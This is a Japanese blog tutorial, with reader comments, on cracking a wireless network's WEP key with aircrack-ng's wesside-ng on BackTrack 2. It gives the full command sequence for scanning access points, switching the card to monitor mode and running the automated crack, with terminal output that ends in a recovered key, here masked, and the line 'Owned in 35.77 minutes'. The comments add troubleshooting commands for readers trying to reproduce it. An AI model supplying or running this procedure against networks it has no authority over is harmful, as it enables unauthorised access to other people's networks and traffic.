So-net無料ブログ作成

【無線LAN crack】 BackTrack 2 aircrack-ng 1.0-beta1 [Aircrack-ng]

前回の記事で無線LAN crackの事前準備をご紹介しました 

WEPは40ビットor104ビットのWEPキーと24ビットのIVでキーストリームを生成・通信暗号化を行いますが、IVは平文で送信されるため、IVを大量に採集することでWEPキーの推測が可能です 

aircrack-ng 1.0-beta1からwesside-ngコマンドが追加されています 
Wesside-ng is an auto-magic tool which incorporates a number of techniques to seamlessly obtain a WEP key in minutes. 

1)無線LANカードの認識を確認する。

bt ~ # lspci
00:00.0 Host bridge: Intel Corporation 82440MX Host Bridge (rev 01)
(途中略)
00:0c.0 Ethernet controller: Atheros Communications, Inc. AR5212 802.11abg NIC (rev 01) 

2)アクセスポイントを確認する。

bt ~ # ifconfig wifi0 up
bt ~ # ifconfig ath0 up
bt ~ # iwlist ath0 scan
ath0      Scan completed :
          Cell 01 - Address: 00:0D:02:4E:XX:XX
                    ESSID:"JUPITER"
                    Mode:Master
                    Frequency:2.447 GHz (Channel 8)
                    Quality=39/94  Signal level=-56 dBm  Noise level=-95 dBm
                    Encryption key:on
                    Bit Rates:1 Mb/s; 2 Mb/s; 5.5 Mb/s; 11 Mb/s; 6 Mb/s
                              12 Mb/s; 24 Mb/s; 36 Mb/s; 9 Mb/s; 18 Mb/s
                              48 Mb/s; 54 Mb/s
                    Extra:bcn_int=100

3)ath0をmonitorモードにする。(atherosチップの場合) 

bt ~ # wlanconfig ath0 destroy
bt ~ # wlanconfig ath0 create wlandev wifi0 wlanmode monitor 

bt ~ # iwconfig ath0
ath0      IEEE 802.11g  ESSID:""  Nickname:""
          Mode:Monitor  Channel:0  Access Point: Not-Associated
          Bit Rate:0 kb/s   Tx-Power:31 dBm   Sensitivity=0/3
          Retry:off   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
          Link Quality=0/94  Signal level=-91 dBm  Noise level=-91 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0

4)wesside-ngでWEPキーをcrackする。

bt ~ # wesside-ng -i ath0 
[22:40:49] Using mac 00:11:F5:E2:XX:XX
[22:40:49] WARNING: Appending in wep.cap
[22:40:49] WARNING: reading prga from prga.log
[22:40:49] Got 16 bytes of prga IV=(2a:ac:84) PRGA=2A 62 5B 80 DE DA C1 9B E7 D1 AF 9C A8 3E 90 81
[22:40:49] Looking for a victim...
[22:40:51] Found SSID(JUPITER) BSS=(00:0D:02:4E:XX:XX) chan=8
[22:40:51] Authenticated
[22:40:51] Associated (ID=6)
[22:42:42] Got ARP request from (00:1A:73:8B:XX:XX)
[23:00:17] Guessing PRGA 5a (IP byte=188)
[23:00:17] Starting crack PID=9256
[23:00:44] Guessing PRGA 5a (IP byte=188)
[23:00:44] Crack unsuccessful
[23:01:16] Guessing PRGA 5a (IP byte=188)
[23:01:17] Stopping crack PID=9256
[23:15:39] Guessing PRGA 5a (IP byte=188)
[23:15:39] Starting crack PID=13847
[23:16:08] Guessing PRGA 5a (IP byte=188)
[23:16:08] Crack unsuccessful
[23:16:10] Guessing PRGA 5a (IP byte=188)
[23:16:10] Warning... previous crack still running!

[23:16:10] Stopping crack PID=13847

[23:16:10] Starting crack PID=14004
[23:16:35] Guessing PRGA 5a (IP byte=188)
Key: XX:XX:XX:XX:XX


[23:16:35] KEY=(XX:XX:XX:XX:XX) 
Owned in 35.77 minutes 

[23:16:35] Dying...

[23:16:35] Stopping crack PID=14004


[23:16:35] KEY=(XX:XX:XX:XX:XX)
Owned in 35.77 minutes

[23:16:35] Dying...

5)その他特記事項

アクセスポイント WARPSTAR-BaseStation-A48355 
WEPキーは40bit

パソコン IBM Thinkpad i series S30 PeniumⅢ 600Mhz 
無線LANカード 富士通WLL-4030-D50(miniPCI)  

 


nice!(0)  コメント(3)  トラックバック(0) 
共通テーマ:パソコン・インターネット

nice! 0

コメント 3

初心者

wlanconfig ath0 create wlandev wifi0 wlanmode monitor

と仰った通りにコマンドを入力させてもらったのですが、確かめるとなぜかmodeがManagedからMonitorに変わりません。

何か理由は考えられないでしょうか?
by 初心者 (2008-10-27 23:37) 

atc-500

無線LANカードorアダプタがatherosのチップなら
airmon-ng stop ath0
airmon-ng start wifi0
としてみてください。以下の様になると思います。

bt aircrack-ng # airmon-ng stop ath0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (VAP destroyed)

bt aircrack-ng # airmon-ng start wifi0
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)


by atc-500 (2008-10-28 23:06) 

Eagle

こんにちは。
今回、VMware playerでホストVista、ゲストBackTrack 3で試してみたのですが、そもそも無線のデバイス自体が認識されていないようなのです。
前にUbuntuでAircrack-ngを試したのですが、結局できませんでした。

どうしたら良いのでしょうか。
ご教示お願いします。
by Eagle (2009-03-08 19:22) 

コメントを書く

お名前:
URL:
コメント:
画像認証:
下の画像に表示されている文字を入力してください。

Facebook コメント

トラックバック 0